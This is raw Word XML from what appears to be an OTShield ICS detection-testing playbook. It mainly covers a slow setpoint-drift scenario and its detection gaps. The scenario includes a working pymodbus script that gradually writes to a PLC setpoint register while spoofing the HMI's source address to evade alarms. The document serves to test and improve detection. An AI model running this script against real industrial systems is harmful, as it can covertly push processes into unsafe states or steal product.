          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/firmware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/upgrade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> against PLC IPs is enough.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Allowlist for vendor-recommended endpoints</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — e.g. Schneider Ecostruxure polling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/api/v1/status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is benign; suppress those.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 12  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>Slow drift — historian / setpoint poisoning</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MITRE ATT&amp;CK for ICS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0856 — Spoof Reporting Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>(gap) MEDIUM (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modbus TCP (any read)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manipulation of Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Instead of a sudden malicious write, the attacker drifts a tag value by ±0.1% per cycle over hours or days. The historian records the drift as gradual, the operator never sees an alarm because each individual step is within deadband, but the cumulative effect moves the process to an unsafe operating point or steals product (over-fill, under-bill). This is the slow-burn variant of scenario 02 — and the hardest class of ICS attack for any rule-based detector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Drift the setpoint register by 1 unit every 30s for 4 hours. None of OTShield's current rules will fire — each individual write is indistinguishable from legitimate control.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="D0D5DD"/>
          <w:left w:val="single" w:sz="4" w:color="D0D5DD"/>
          <w:bottom w:val="single" w:sz="4" w:color="D0D5DD"/>
          <w:right w:val="single" w:sz="4" w:color="D0D5DD"/>
          <w:insideH w:val="single" w:sz="4" w:color="D0D5DD"/>
          <w:insideV w:val="single" w:sz="4" w:color="D0D5DD"/>
        </w:tblBorders>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># scenario12_slow_drift.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>from pymodbus.client import ModbusTcpClient</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>import time</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PLC = '10.10.2.20'</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>REG = 40001                  # setpoint</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DRIFT_PER_STEP = 1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>STEP_INTERVAL_S = 30</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>STEPS = 480                  # 4 hours</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>with ModbusTcpClient(PLC, source_address=('10.10.1.10', 0)) as c:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    cur = c.read_holding_registers(REG, 1, slave=1).registers[0]</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    for _ in range(STEPS):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        cur += DRIFT_PER_STEP</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        c.write_register(REG, cur, slave=1)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        time.sleep(STEP_INTERVAL_S)</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Source from the legitimate HMI (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.10.1.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) so cross-zone rules cannot help.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">For a faster demo, compress timeline by setting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>STEP_INTERVAL_S = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>STEPS = 30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>; the absence of detection is the lesson, not the duration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EXPECTED OTSHIELD DETECTION</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ayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rule ID (current)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>(none) — every individual write looks legitimate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rule ID (gap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.value_drift</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cumulative change of register value &gt; N% over rolling window with &gt; M monotonic writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0856 — Spoof Reporting Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Today: the writes appear in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DPI Events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> but no anomaly. Use this scenario in the demo to set up the conversation about *what statistical detection requires*.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Workaround: open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Topology → DPI modal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the edge and inspect the function-code histogram — FC 0x06 count climbs steadily. Trained eye spots it; no automation today.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">After the gap rule lands: anomaly title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Slow value drift detected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicators </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>register:40001 delta:N% steps:M direction:monotonic_increase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Slow drift attacks are how sophisticated insiders or nation-state actors steal value or sabotage processes without tripping any alarm:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Process drift to unsafe envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — gradual setpoint move past safety limits. Operator's deadband-based mental model masks it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Material theft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — drift in dosing or fill setpoints over weeks adds up to measurable product loss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Forensic difficulty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — once detected, the attack started weeks ago; correlating to a specific compromise is much harder than for an instantaneous write.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>This is OTShield's most important roadmap item — semantic / statistical detection is the next maturity level beyond protocol-syntactic rules:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Value-history materialised view</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — every write to a holding register persists the (timestamp, value) pair. Storage cost = ~50 bytes per write per asset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>dpi.value_drift rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — sliding-window monotonic-trend detector (Mann-Kendall test, or simpler: count consecutive same-direction writes ≥ N).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Per-tag deadband configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — accept a CSV mapping (asset, register) → (deadband, max_rate_of_change). Without this, the rule will produce noise on tags that are *supposed* to ramp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Historian integration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — for sites that already run an OSI PI / Aveva historian, pull the tag's process value series and run drift detection there instead of from raw Modbus traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Roadmap: capabilities surfaced by the gap analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Every '(gap)' item in the scenarios above maps to a discrete engineering item. They are listed here in priority order — defined as the product of attack frequency (how likely is a real adversary to use this technique) and detection feasibility (how much engineering work to ship the rule).</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ook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Pri</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Closes scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IEC-104 control-direction rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
